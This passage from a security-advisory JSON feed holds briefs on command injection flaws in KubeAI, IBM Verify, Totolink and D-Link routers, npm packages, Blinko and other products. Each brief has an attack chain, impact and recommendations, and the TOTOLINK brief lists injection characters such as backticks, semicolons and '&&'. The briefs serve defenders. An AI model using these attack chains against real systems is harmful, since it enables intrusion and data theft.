-c\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe Kubernetes kubelet executes the startup probe, running the attacker-injected shell commands within the pod\u0026rsquo;s context.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves arbitrary command execution inside the model server pod, potentially leading to data exfiltration, lateral movement, or compromise of the model serving infrastructure.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows for arbitrary command execution within KubeAI model server pods. This can lead to several severe consequences: data exfiltration from the pod\u0026rsquo;s environment (environment variables, mounted secrets, service account tokens), lateral movement to other cluster resources in multi-tenant environments, and compromise of the model serving infrastructure. An attacker with Model creation permissions can execute arbitrary commands in model pods, potentially accessing sensitive data. The vulnerability affects KubeAI installations version 0.23.1 and earlier.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade KubeAI to a version beyond 0.23.1 that includes the fix for CVE-2026-34940.\u003c/li\u003e\n\u003cli\u003eImplement strict RBAC policies to limit who can create or update \u003ccode\u003eModel\u003c/code\u003e custom resources.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect KubeAI Model Resource Command Injection\u0026rdquo; to identify malicious \u003ccode\u003eModel\u003c/code\u003e resources being created or updated.\u003c/li\u003e\n\u003cli\u003eMonitor Kubernetes audit logs for suspicious activity related to \u003ccode\u003eModel\u003c/code\u003e custom resource creation and updates.\u003c/li\u003e\n\u003cli\u003eIf upgrading is not immediately feasible, consider implementing a Kubernetes admission webhook that validates and sanitizes the \u003ccode\u003espec.url\u003c/code\u003e field of \u003ccode\u003eModel\u003c/code\u003e custom resources, allowing only alphanumeric characters, slashes, colons, dots, and hyphens.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-01T23:22:43Z","date_published":"2026-04-01T23:22:43Z","id":"/briefs/2026-04-kubeai-command-injection/","summary":"The KubeAI project is vulnerable to OS command injection because the `ollamaStartupProbeScript()` function constructs a shell command string using `fmt.Sprintf` with unsanitized model URL components (`ref`, `modelParam`), which is then executed via `bash -c` as a Kubernetes startup probe, allowing arbitrary command execution inside model server pods by attackers with the ability to create or update `Model` custom resources.","title":"KubeAI OS Command Injection via Model URL in Ollama Engine Startup Probe","url":"https://feed.craftedsignal.io/briefs/2026-04-kubeai-command-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.3,"id":"CVE-2026-1345"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["command-injection","rce","cve-2026-1345"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eIBM Verify Identity Access Container versions 11.0 through 11.0.2 and IBM Security Verify Access Container versions 10.0 through 10.0.9.1, as well as IBM Verify Identity Access 11.0 through 11.0.2 and IBM Security Verify Access 10.0 through 10.0.9.1, are vulnerable to command injection. An unauthenticated attacker can exploit this vulnerability (CVE-2026-1345) to execute arbitrary commands with lower user privileges due to insufficient input validation. This poses a significant risk as it could lead to unauthorized access, data breaches, or system compromise if successfully exploited. Defenders need to ensure systems are patched and monitor for suspicious activity.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn unauthenticated attacker sends a malicious request to the vulnerable IBM Verify or Security Verify Access server.\u003c/li\u003e\n\u003cli\u003eThe request contains crafted input designed to exploit the command injection vulnerability.\u003c/li\u003e\n\u003cli\u003eThe server fails to properly validate the user-supplied input.\u003c/li\u003e\n\u003cli\u003eThe malicious input is passed to an operating system command.\u003c/li\u003e\n\u003cli\u003eThe server executes the attacker-controlled command with the privileges of the compromised user (lower user privileges).\u003c/li\u003e\n\u003cli\u003eThe attacker gains unauthorized access to the system.\u003c/li\u003e\n\u003cli\u003eThe attacker can then potentially escalate privileges, move laterally, or exfiltrate sensitive data.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability (CVE-2026-1345) allows an unauthenticated attacker to execute arbitrary commands on the affected system with lower user privileges. While the attacker does not gain root access directly, this vulnerability can be used as a stepping stone to further compromise the system, potentially leading to data breaches, service disruption, or complete system takeover. The lack of initial authentication makes it easily exploitable.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply the security patch provided by IBM as detailed in their advisory to remediate CVE-2026-1345 (\u003ca href=\"https://www.ibm.com/support/pages/node/7268253)\"\u003ehttps://www.ibm.com/support/pages/node/7268253)\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eImplement input validation and sanitization measures on all user-supplied input to prevent command injection attacks.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for suspicious requests and patterns that indicate command injection attempts, creating correlation rules using webserver logs.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-01T21:16:58Z","date_published":"2026-04-01T21:16:58Z","id":"/briefs/2026-04-ibm-verify-rce/","summary":"Unauthenticated command execution is possible in IBM Verify Identity Access Container and IBM Security Verify Access Container due to improper validation of user-supplied input, allowing arbitrary command execution with lower privileges.","title":"IBM Verify Identity Access and Security Verify Access Command Injection Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-ibm-verify-rce/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.6,"id":"CVE-2026-24154"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["cve-2026-24154","nvidia","jetson","initrd","command injection","privilege escalation"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCVE-2026-24154 affects NVIDIA Jetson Linux and stems from a flaw within the initrd (initial RAM disk) process.  An unprivileged attacker with physical access to a vulnerable device can inject malicious command-line arguments during the boot process. This injection can subvert the intended system initialization, leading to a variety of severe consequences.  The vulnerability was published on March 31, 2026, and has a CVSS v3.1 score of 7.6. The affected versions of Jetson Linux are not specified in the source.  Successful exploitation allows attackers to execute arbitrary code, escalate privileges, cause denial of service, tamper with data, and disclose sensitive information. Defenders should focus on securing physical access and monitoring boot processes for unauthorized modifications.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains physical access to the NVIDIA Jetson device.\u003c/li\u003e\n\u003cli\u003eAttacker interrupts the boot process to gain access to the bootloader. This may involve pressing specific keys during startup or utilizing hardware tools.\u003c/li\u003e\n\u003cli\u003eAttacker modifies the kernel command line arguments passed to the initrd. This is achieved by manipulating bootloader settings.\u003c/li\u003e\n\u003cli\u003eThe modified command line arguments inject malicious commands or alter the execution path within the initrd environment.\u003c/li\u003e\n\u003cli\u003eDuring initrd execution, the injected commands are processed, leading to code execution within the early boot environment. This bypasses normal user authentication and security measures.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the initial code execution to escalate privileges by exploiting vulnerabilities within the initrd environment or system binaries.\u003c/li\u003e\n\u003cli\u003eWith escalated privileges, the attacker gains control over the system, enabling them to install persistent backdoors, tamper with system configurations, or exfiltrate sensitive data.\u003c/li\u003e\n\u003cli\u003eThe final objective is achieved, which can range from complete system compromise and data theft to denial-of-service attacks.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-24154 can lead to a complete compromise of the NVIDIA Jetson Linux device. The attacker can achieve code execution, escalate privileges, and gain persistent access. This could result in data breaches, system instability, and the deployment of malicious software. While the number of potential victims and specific sectors targeted are not mentioned in the source, the vulnerability affects devices used in various embedded systems, robotics, and edge computing applications.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRestrict physical access to NVIDIA Jetson devices to prevent unauthorized manipulation of the boot process.\u003c/li\u003e\n\u003cli\u003eMonitor boot logs and system events for unusual command-line arguments or modifications to the initrd environment. Deploy the Sigma rule \u003ccode\u003eDetect Modified Kernel Command Line\u003c/code\u003e to identify suspicious boot activity.\u003c/li\u003e\n\u003cli\u003eConsider implementing secure boot mechanisms to prevent unauthorized modifications to the bootloader and kernel.\u003c/li\u003e\n\u003cli\u003eInvestigate any unauthorized access attempts or physical tampering with Jetson devices.\u003c/li\u003e\n\u003cli\u003eApply any available patches or updates from NVIDIA to mitigate the vulnerability when they become available via NVIDIA\u0026rsquo;s customer support portal referenced in the advisory.\u003c/li\u003e\n\u003cli\u003eMonitor network connections originating from the device after boot for unexpected or malicious activity, using network connection logs, to identify potential exploitation attempts.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-31T17:16:30Z","date_published":"2026-03-31T17:16:30Z","id":"/briefs/2026-03-nvidia-jetson-initrd-vuln/","summary":"CVE-2026-24154 is a vulnerability in NVIDIA Jetson Linux where an unprivileged attacker with physical access can inject incorrect command line arguments into initrd, potentially leading to code execution, privilege escalation, denial of service, data tampering, and information disclosure.","title":"NVIDIA Jetson Linux initrd Command Injection Vulnerability (CVE-2026-24154)","url":"https://feed.craftedsignal.io/briefs/2026-03-nvidia-jetson-initrd-vuln/"},{"_cs_actors":[],"_cs_cves":[{"cvss":9.8,"id":"CVE-2026-32917"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["command-injection","imessage","openclaw"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOpenClaw, a software application whose specific function is not detailed in the provided context, is vulnerable to a remote command injection flaw. Specifically, versions prior to 2026.3.13 are susceptible. This vulnerability, identified as CVE-2026-32917, resides within the iMessage attachment staging process.  Attackers can exploit this flaw by injecting shell metacharacters into unsanitized remote attachment paths. This occurs because these paths are directly passed to the SCP command…\u003c/p\u003e\n","date_modified":"2026-03-31T12:16:28Z","date_published":"2026-03-31T12:16:28Z","id":"/briefs/2026-03-openclaw-rce/","summary":"OpenClaw before 2026.3.13 is vulnerable to remote command injection via unsanitized iMessage attachment paths passed to the SCP remote operand, allowing attackers to execute arbitrary commands on configured remote hosts when remote attachment staging is enabled.","title":"OpenClaw Remote Command Injection via iMessage Attachment Staging (CVE-2026-32917)","url":"https://feed.craftedsignal.io/briefs/2026-03-openclaw-rce/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.3,"id":"CVE-2026-5176"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["command-injection","cve-2026-5176","totolink","router"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA command injection vulnerability, identified as CVE-2026-5176, has been discovered in Totolink A3300R routers running firmware version 17.0.0cu.557_b20221024. The vulnerability resides within the \u003ccode\u003esetSyslogCfg\u003c/code\u003e function located in the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e file. An unauthenticated, remote attacker can exploit this flaw by manipulating arguments passed to the vulnerable function. This manipulation results in the execution of arbitrary commands on the affected device. Given the public…\u003c/p\u003e\n","date_modified":"2026-03-31T02:15:59Z","date_published":"2026-03-31T02:15:59Z","id":"/briefs/2026-03-totolink-cve-2026-5176/","summary":"A command injection vulnerability (CVE-2026-5176) exists in the setSyslogCfg function of the Totolink A3300R router version 17.0.0cu.557_b20221024, allowing remote attackers to execute arbitrary commands by manipulating arguments in the /cgi-bin/cstecgi.cgi file.","title":"Totolink A3300R Command Injection Vulnerability (CVE-2026-5176)","url":"https://feed.craftedsignal.io/briefs/2026-03-totolink-cve-2026-5176/"},{"_cs_actors":[],"_cs_cves":[{"cvss":9.1,"id":"CVE-2026-21861"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-21861","command-injection","webserver"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003ebaserCMS, a website development framework, is susceptible to an OS command injection vulnerability (CVE-2026-21861) in versions prior to 5.2.3. This flaw resides within the core update functionality, where user-controlled input is directly passed to the \u003ccode\u003eexec()\u003c/code\u003e function without proper sanitization or validation. A successful exploit allows an authenticated administrator to execute arbitrary operating system commands on the underlying server. The vulnerability was reported on March 30, 2026…\u003c/p\u003e\n","date_modified":"2026-03-31T01:19:59Z","date_published":"2026-03-31T01:19:59Z","id":"/briefs/2026-04-basercms-command-injection/","summary":"baserCMS versions prior to 5.2.3 are vulnerable to OS command injection, allowing an authenticated administrator to execute arbitrary commands on the server via maliciously crafted input to the core update functionality.","title":"baserCMS OS Command Injection Vulnerability (CVE-2026-21861)","url":"https://feed.craftedsignal.io/briefs/2026-04-basercms-command-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":9.1,"id":"CVE-2026-30877"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["basercms","command-injection","webserver"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003ebaserCMS is a website development framework. Prior to version 5.2.3, a critical OS command injection vulnerability exists within the update functionality. This flaw allows an attacker, authenticated as an administrator, to inject and execute arbitrary operating system commands on the server hosting baserCMS. The commands are executed with the privileges of the user account running the baserCMS application, potentially leading to complete system compromise. This vulnerability was reported on…\u003c/p\u003e\n","date_modified":"2026-03-31T01:16:35Z","date_published":"2026-03-31T01:16:35Z","id":"/briefs/2026-03-basercms-cmd-injection/","summary":"baserCMS prior to version 5.2.3 contains an OS command injection vulnerability in the update functionality, allowing authenticated administrators to execute arbitrary OS commands on the server.","title":"baserCMS OS Command Injection Vulnerability (CVE-2026-30877)","url":"https://feed.craftedsignal.io/briefs/2026-03-basercms-cmd-injection/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["CVE-2026-34005","command-injection","xiongmai","dvr","nvr"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eXiongmai DVR/NVR devices, specifically models AHB7008T-MH-V2 and NBD7024H-P running firmware version 4.03.R11, are susceptible to root OS command injection (CVE-2026-34005). This vulnerability arises from the inadequate sanitization of the HostName value within the NetWork.NetCommon configuration handler. An authenticated attacker can inject shell metacharacters into the HostName parameter through a DVRIP protocol request via TCP port 34567. Due to the use of the \u003ccode\u003esystem()\u003c/code\u003e function, these…\u003c/p\u003e\n","date_modified":"2026-03-29T17:16:44Z","date_published":"2026-03-29T17:16:44Z","id":"/briefs/2026-03-xiongmai-command-injection/","summary":"Xiongmai DVR/NVR devices are vulnerable to root OS command injection (CVE-2026-34005) due to shell metacharacters in the HostName value, exploitable via an authenticated DVRIP request, potentially allowing arbitrary command execution with root privileges.","title":"Xiongmai DVR/NVR Root OS Command Injection Vulnerability (CVE-2026-34005)","url":"https://feed.craftedsignal.io/briefs/2026-03-xiongmai-command-injection/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["command-injection","rce","foreman"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCVE-2026-1961 identifies a critical command injection vulnerability within the Foreman application, specifically affecting the WebSocket proxy implementation. This flaw stems from the use of unsanitized hostname values obtained from compute resource providers during the construction of shell commands. An attacker who controls a malicious compute resource server can exploit this vulnerability to execute arbitrary code on the Foreman server. This is achieved when a user interacts with the VM VNC…\u003c/p\u003e\n","date_modified":"2026-03-26T13:16:27Z","date_published":"2026-03-26T13:16:27Z","id":"/briefs/2026-03-foreman-rce/","summary":"A command injection vulnerability exists in Foreman's WebSocket proxy, enabling remote code execution on the Foreman server via a malicious compute resource server when a user accesses VM VNC console functionality.","title":"Foreman WebSocket Proxy Command Injection Vulnerability (CVE-2026-1961)","url":"https://feed.craftedsignal.io/briefs/2026-03-foreman-rce/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["command-injection","nodejs","tesseract-ocr","cve-2026-26832"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThe node-tesseract-ocr npm package, a Node.js wrapper for Tesseract OCR, is vulnerable to OS command injection (CVE-2026-26832) in versions 2.2.1 and earlier. The vulnerability exists within the \u003ccode\u003erecognize()\u003c/code\u003e function located in \u003ccode\u003esrc/index.js\u003c/code\u003e. The \u003ccode\u003efile path\u003c/code\u003e parameter, used to specify the image for OCR processing, is directly concatenated into a shell command string without proper sanitization. This unsanitized string is then passed to \u003ccode\u003echild_process.exec()\u003c/code\u003e, enabling attackers to inject arbitrary commands that are executed by the system. Exploitation can lead to complete system compromise, data exfiltration, or denial of service.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker crafts a malicious file path containing OS commands.\u003c/li\u003e\n\u003cli\u003eThe attacker passes the malicious file path to the \u003ccode\u003erecognize()\u003c/code\u003e function within the \u003ccode\u003enode-tesseract-ocr\u003c/code\u003e package.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003erecognize()\u003c/code\u003e function concatenates the attacker-controlled file path into a command string.\u003c/li\u003e\n\u003cli\u003eThe command string, now containing injected OS commands, is passed to \u003ccode\u003echild_process.exec()\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003echild_process.exec()\u003c/code\u003e executes the command string.\u003c/li\u003e\n\u003cli\u003eThe injected OS commands are executed by the system with the privileges of the Node.js process.\u003c/li\u003e\n\u003cli\u003eThe attacker gains arbitrary code execution on the target system.\u003c/li\u003e\n\u003cli\u003eThe attacker can then perform actions such as installing malware, creating new user accounts, or exfiltrating sensitive data.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the server hosting the Node.js application. This can lead to complete system compromise, potentially impacting all data and services hosted on the compromised server. The severity is heightened because the vulnerability is remotely exploitable and requires no user interaction. Systems using affected versions of \u003ccode\u003enode-tesseract-ocr\u003c/code\u003e are at high risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade the \u003ccode\u003enode-tesseract-ocr\u003c/code\u003e package to a patched version that addresses CVE-2026-26832 if available.\u003c/li\u003e\n\u003cli\u003eImplement strict input validation and sanitization for the file path parameter passed to the \u003ccode\u003erecognize()\u003c/code\u003e function, mitigating command injection attempts.\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for unusual processes spawned by Node.js (\u003ccode\u003enode.exe\u003c/code\u003e or \u003ccode\u003enode\u003c/code\u003e) to detect potential exploitation using the provided Sigma rule.\u003c/li\u003e\n\u003cli\u003eReview and audit all uses of \u003ccode\u003echild_process.exec()\u003c/code\u003e within Node.js applications to identify and remediate other potential command injection vulnerabilities.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-26T12:00:00Z","date_published":"2026-03-26T12:00:00Z","id":"/briefs/2026-03-node-tesseract-ocr-command-injection/","summary":"The node-tesseract-ocr npm package through version 2.2.1 is vulnerable to OS command injection due to improper sanitization of the file path parameter in the recognize() function, potentially allowing for arbitrary command execution.","title":"node-tesseract-ocr OS Command Injection Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-03-node-tesseract-ocr-command-injection/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["command-injection","rce","vulnerability","netcore","router"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA remote command execution vulnerability, CVE-2026-4840, affects Netcore Power 15AX devices with firmware versions up to 3.0.0.6938. The vulnerability resides in the Diagnostic Tool Interface, specifically within the \u003ccode\u003esetTools\u003c/code\u003e function of the \u003ccode\u003e/bin/netis.cgi\u003c/code\u003e file. By manipulating the \u003ccode\u003eIpAddr\u003c/code\u003e argument, an attacker can inject and execute arbitrary operating system commands on the device. This vulnerability poses a significant risk, as it allows unauthenticated remote attackers to gain complete…\u003c/p\u003e\n","date_modified":"2026-03-26T05:16:40Z","date_published":"2026-03-26T05:16:40Z","id":"/briefs/2026-03-netcore-rce/","summary":"CVE-2026-4840 is a critical command injection vulnerability in the Netcore Power 15AX router that allows remote attackers to execute arbitrary OS commands by manipulating the IpAddr argument in the setTools function of the /bin/netis.cgi file.","title":"Netcore Power 15AX Remote Command Execution Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-03-netcore-rce/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["command-injection","npm","CVE-2026-26830","pdf"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThe pdf-image npm package, up to version 2.0.0, contains a critical vulnerability (CVE-2026-26830) that allows for OS command injection. This vulnerability stems from the way the package handles user-provided file paths when processing PDF files. Specifically, the \u003ccode\u003econstructGetInfoCommand\u003c/code\u003e and \u003ccode\u003econstructConvertCommandForPage\u003c/code\u003e functions utilize \u003ccode\u003eutil.format()\u003c/code\u003e to incorporate the \u003ccode\u003epdfFilePath\u003c/code\u003e parameter directly into shell command strings. These commands are then executed using…\u003c/p\u003e\n","date_modified":"2026-03-25T15:16:38Z","date_published":"2026-03-25T15:16:38Z","id":"/briefs/2026-03-pdf-image-command-injection/","summary":"The pdf-image npm package through version 2.0.0 is vulnerable to OS command injection via the pdfFilePath parameter due to improper sanitization, potentially leading to arbitrary code execution.","title":"pdf-image npm Package Command Injection Vulnerability (CVE-2026-26830)","url":"https://feed.craftedsignal.io/briefs/2026-03-pdf-image-command-injection/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["cve-2026-23882","command-injection","blinko"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eBlinko, an AI-powered card note-taking application, is vulnerable to an OS Command Injection flaw (CVE-2026-23882) in versions prior to 1.8.4. The vulnerability lies within the Model Context Protocol (MCP) server creation function, which allows for the specification of arbitrary commands and arguments. These commands are executed when the application tests the connection to the MCP server. Successful exploitation of this vulnerability can allow an attacker with high privileges to execute arbitrary code on the system running Blinko. Users of Blinko are advised to upgrade to version 1.8.4 to remediate this vulnerability.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains high-privileged access to the Blinko application.\u003c/li\u003e\n\u003cli\u003eAttacker navigates to the MCP server creation function within Blinko.\u003c/li\u003e\n\u003cli\u003eAttacker injects malicious commands into the command or arguments fields of the MCP server creation form.\u003c/li\u003e\n\u003cli\u003eBlinko attempts to establish a connection to the attacker-controlled MCP server using the injected command.\u003c/li\u003e\n\u003cli\u003eThe injected command executes on the Blinko server due to insufficient input sanitization.\u003c/li\u003e\n\u003cli\u003eAttacker achieves arbitrary code execution on the Blinko server.\u003c/li\u003e\n\u003cli\u003eAttacker leverages the compromised Blinko instance to further compromise the host system or other internal resources.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-23882 can allow an attacker with high privileges to achieve arbitrary code execution on systems running vulnerable versions of Blinko. This can lead to full system compromise, data theft, or denial-of-service. While the exact number of affected Blinko installations is unknown, any Blinko instance running a version prior to 1.8.4 is susceptible to this vulnerability if an attacker gains high-privileged access to the application.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade Blinko to version 1.8.4 or later to patch CVE-2026-23882 (see references for the release notes).\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for connections to unusual or unexpected external IPs originating from Blinko processes after updates.\u003c/li\u003e\n\u003cli\u003eImplement strict input validation and sanitization on all user-supplied input within the Blinko application to prevent command injection attacks in the future.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-25T12:00:00Z","date_published":"2026-03-25T12:00:00Z","id":"/briefs/2026-03-blinko-command-injection/","summary":"Blinko versions before 1.8.4 are vulnerable to OS Command Injection (CWE-78), where the MCP server creation function allows specifying arbitrary commands and arguments that are executed when testing the connection, potentially leading to code execution for attackers with high privileges.","title":"Blinko Pre-1.8.4 OS Command Injection Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-03-blinko-command-injection/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["totolink","rce","command-injection","cve-2026-4611"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA critical vulnerability, CVE-2026-4611, affects TOTOLINK X6000R routers running firmware versions 9.4.0cu.1360_B20241207 and 9.4.0cu.1498_B20250826. This vulnerability allows a remote attacker to inject operating system commands by manipulating the Hostname argument passed to the \u003ccode\u003esetLanCfg\u003c/code\u003e function within the \u003ccode\u003e/usr/sbin/shttpd\u003c/code\u003e binary. Successful exploitation grants the attacker the ability to execute arbitrary commands with elevated privileges on the router. Given the widespread deployment of these routers in home and small office networks, this vulnerability poses a significant risk of compromise, potentially leading to data theft, botnet recruitment, or denial-of-service attacks. The vulnerability was reported on March 23, 2026.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a vulnerable TOTOLINK X6000R router running firmware version 9.4.0cu.1360_B20241207 or 9.4.0cu.1498_B20250826.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request targeting the \u003ccode\u003e/usr/sbin/shttpd\u003c/code\u003e web server.\u003c/li\u003e\n\u003cli\u003eThe malicious request includes a modified \u003ccode\u003eHostname\u003c/code\u003e argument within the \u003ccode\u003esetLanCfg\u003c/code\u003e function call.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eHostname\u003c/code\u003e argument contains OS command injection payloads such as backticks, semicolons, or command chaining operators (e.g., \u003ccode\u003e\u0026amp;\u0026amp;\u003c/code\u003e, \u003ccode\u003e||\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eshttpd\u003c/code\u003e process, running with elevated privileges, processes the malicious \u003ccode\u003eHostname\u003c/code\u003e argument without proper sanitization.\u003c/li\u003e\n\u003cli\u003eThe injected OS commands are executed by the system shell, leading to arbitrary code execution.\u003c/li\u003e\n\u003cli\u003eThe attacker gains control of the router\u0026rsquo;s operating system.\u003c/li\u003e\n\u003cli\u003eThe attacker can then perform a variety of malicious actions, such as exfiltrating sensitive data, modifying router configurations, or using the router as a foothold for further network attacks.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-4611 allows attackers to execute arbitrary commands on vulnerable TOTOLINK X6000R routers. This could lead to a complete compromise of the device, allowing attackers to steal sensitive information such as Wi-Fi passwords, intercept network traffic, or use the router as a launching point for attacks against other devices on the network. Given the potential for widespread exploitation, a large number of home and small business networks could be affected, resulting in significant financial and reputational damage.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs (category: \u003ccode\u003ewebserver\u003c/code\u003e, product: \u003ccode\u003elinux\u003c/code\u003e) for requests containing suspicious characters or command injection attempts within the \u003ccode\u003eHostname\u003c/code\u003e argument when accessing the \u003ccode\u003e/usr/sbin/shttpd\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eImplement the provided Sigma rule to detect exploitation attempts in web server logs.\u003c/li\u003e\n\u003cli\u003eContact TOTOLINK for a security patch or upgrade guidance.\u003c/li\u003e\n\u003cli\u003eConsider implementing network segmentation to limit the impact of a compromised router.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-24T12:00:00Z","date_published":"2026-03-24T12:00:00Z","id":"/briefs/2026-03-totolink-rce/","summary":"A remote command injection vulnerability exists in TOTOLINK X6000R routers, specifically versions 9.4.0cu.1360_B20241207 and 9.4.0cu.1498_B20250826, allowing attackers to execute arbitrary commands via manipulation of the Hostname argument in the setLanCfg function.","title":"TOTOLINK X6000R Remote Command Injection Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-03-totolink-rce/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["command-injection","router","legacy-device"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCVE-2026-4627 is an OS command injection vulnerability affecting D-Link DIR-825 and DIR-825R routers, specifically versions 1.0.5 and 4.5.1. The vulnerability resides within the \u003ccode\u003ehandler_update_system_time\u003c/code\u003e function of the \u003ccode\u003elibdeuteron_modules.so\u003c/code\u003e file, which is part of the NTP service. An attacker with administrative privileges can inject arbitrary OS commands by manipulating the input to this function. The vulnerability can be exploited remotely, allowing a threat actor to potentially gain…\u003c/p\u003e\n","date_modified":"2026-03-24T05:16:24Z","date_published":"2026-03-24T05:16:24Z","id":"/briefs/2026-03-dlink-command-injection/","summary":"CVE-2026-4627 is an OS command injection vulnerability in the handler_update_system_time function of the libdeuteron_modules.so file in the NTP Service component of D-Link DIR-825 and DIR-825R devices, which can be exploited remotely by authenticated attackers.","title":"D-Link DIR-825/825R OS Command Injection Vulnerability 